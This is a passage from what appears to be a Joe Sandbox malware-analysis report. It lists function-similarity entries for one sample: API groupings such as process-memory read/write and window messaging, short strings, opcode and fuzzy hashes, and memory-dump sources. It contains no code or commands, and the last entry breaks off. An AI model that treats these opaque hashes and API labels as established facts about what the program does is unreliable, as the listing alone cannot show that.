                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                      • Instruction ID: 23355bf76174e2c42ff4179b590a3e7c54ebb2b5779c965cd56e59c3d82effa2
                                                                      • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                      • Instruction Fuzzy Hash: 9C114C36A08B42C6E750EF56F841569B7B4FB88F80B594436DF8993B15EF38E815CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                      • Instruction ID: 654d28d4677701077f888db0cb33859542520e32e402cf0cbc1b50b929bbf77b
                                                                      • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                      • Instruction Fuzzy Hash: 57119E36608B82C6E754EF16E842169B7B4FB88F80B55443ADF8C93B15EF38E415CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                      • Instruction ID: 6e4d90d9c43acc960942ae8c40b57573fdde36bfc2c01dc51318329e580ba3d5
                                                                      • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                      • Instruction Fuzzy Hash: 51112A26A1CB4286E744BB26E41232A62A4EF85BC0F584035DE4ED7B5AEF2DD8459700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                      • Instruction ID: 175e0d1c524d6475512d9aa1e747efa35e9f202b82027ef5f57e0e3799c00294
                                                                      • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                      • Instruction Fuzzy Hash: DE116522A0CA46C5EB69BF34E4563792360FF88B44F444031D98DE729AEF7CD989D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                      • Instruction ID: fdc933956724cd8ef03adbc6928b62ba50996ec4a256c768a723f2d6e933f5f7
                                                                      • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                      • Instruction Fuzzy Hash: C1017521A1CA0286EB45BB36A4D71399361AF957C1B584235E20FF16B3EF2DE4859B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                      • Instruction ID: aaea0177308efa1ecc3ea54c929f50be56d2761bf831fcaf618c2b29aeff6c87
                                                                      • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                      • Instruction Fuzzy Hash: A101B131D0CA4385FBA8BB12A9873343F22BF04B90F180530D55DE62A2EF7DA084A710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                      • Instruction ID: cb8e1c755f444cf45eaeb0804699f8087db4c761667fbc8fdcb43db3703b10de
                                                                      • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                      • Instruction Fuzzy Hash: C8F0C914F1C612C6FB943BB6684B67913927F88742F849030C91AE2353FE2DA499AB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                      • Instruction ID: 06fd68c2f11d0a4180bacb2128fe4159170236d8a1fc1135382f0dd3ce43a7cc
                                                                      • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                      • Instruction Fuzzy Hash: ECF06D10F1C60286FF943BB2684B27812526F48792F849030C90AE2397FF7DA49DAB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                      • String ID: .lnk
                                                                      • API String ID: 948891078-24824748
                                                                      • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction ID: 0179f57508dc96c4eaaeb54c44c4e40d7c86ca882b9e1bb27a09603c8b30fd9d
                                                                      • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction Fuzzy Hash: E4D19062B1CA4681EB10FB25D4922EE6B60FB84B88F405431EE4ED7BA6EF3CD545D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: $*
                                                                      • API String ID: 3215553584-3982473090
                                                                      • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                      • Instruction ID: 1626da13ace68099210197c143d96476d12ff39572c4466a9149f3d43308a130
                                                                      • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                      • Instruction Fuzzy Hash: 3B61953290D24286E769BF25884637C37A0EB25B08F141235C6EAE11DBFF69E481E740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$acos
                                                                      • API String ID: 1156100317-2870037509
                                                                      • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction ID: 9498bc5a642675b29b5882556e41e74659adcadd5cee48c5efa6280f05469c5d
                                                                      • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction Fuzzy Hash: 0661BA22D2CF4585E223BB3458133769754BFA63D1F119336E95EF5A66EF2CE0829B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$asin
                                                                      • API String ID: 1156100317-2188059690
                                                                      • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction ID: c04491aec1e753e1e5df679998230794a66642e84de864d8ad2b304f06e6f7a5
                                                                      • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction Fuzzy Hash: 02618522D2CF8185E653BF3458133769755AFA63D1F109332E95EF5A66EF2CA0829A00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction ID: a6b7b48e9ed5ad677ae4048cbfd81a4e41c615c54399590b32e1c4f9ff91567b
                                                                      • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction Fuzzy Hash: 10519F76A1C68196D720FF52E4869AAB760FBC8B84F451035EE4DA3B4AEE7CD505CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: P
                                                                      • API String ID: 135850232-3110715001
                                                                      • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction ID: f92aa84c6ba80cc2553f09abb7fb2df0c318b496d75a330bcb32ab4a8736a6eb
                                                                      • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction Fuzzy Hash: B9418F32A08A81CAEB60FF19C4463A96765EF84B60F168231DA6DD77D2EF38D542D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                      • String ID: U
                                                                      • API String ID: 2456169464-4171548499
                                                                      • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction ID: 98968892c5482d6f4827681c9a1824d85d4e1767d9418b496265f5b6babcc982
                                                                      • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction Fuzzy Hash: F041B322A1D64282DB60AF15E4463AAB7A1FB88795F404131EE4ED7789EF7CD441D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction ID: 8ffc300297a9b7e9311524e00eecbf8b61463752cda13a4f78f625362c989244
                                                                      • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction Fuzzy Hash: CF414C32A097D286E770AF28A445B9A77A1F784760F144335DAA893A9ADF3CD845CF40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2671490118-1439706946
                                                                      • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction ID: 4cebd3d85aa41ff106b4afb96dce9add417da55e6d83ac4ff4f0cbab529c300d
                                                                      • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction Fuzzy Hash: 434180326086C2C7E370EF55E445B5AB7A0F788790F104235EA9993A99DF3CD4858F00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 1752125012-2298589950
                                                                      • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction ID: e30ee7b653bc1f3e5f5e8714b069c873fc0c8fe2b1d64a5e89428b171c22a1a6
                                                                      • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction Fuzzy Hash: 0131C032A1CB8286EB60EF25E4413AA7361FBC5B91F108136DA8D93B59DF3CD444CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                      • String ID: Listbox
                                                                      • API String ID: 3747482310-2633736733
                                                                      • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction ID: b51039e0ea793375488e90fdaa65be78f6c55057c44369cd42b2638d494d4f86
                                                                      • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction Fuzzy Hash: 35317A326087C186E770EF16B445A5AB7A1F7887A0F504225EEA953B99DF3DD481CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction ID: 1459813af8c084c52d42ef6a25192e07835a1d9e9574375894b59cb7110c7c71
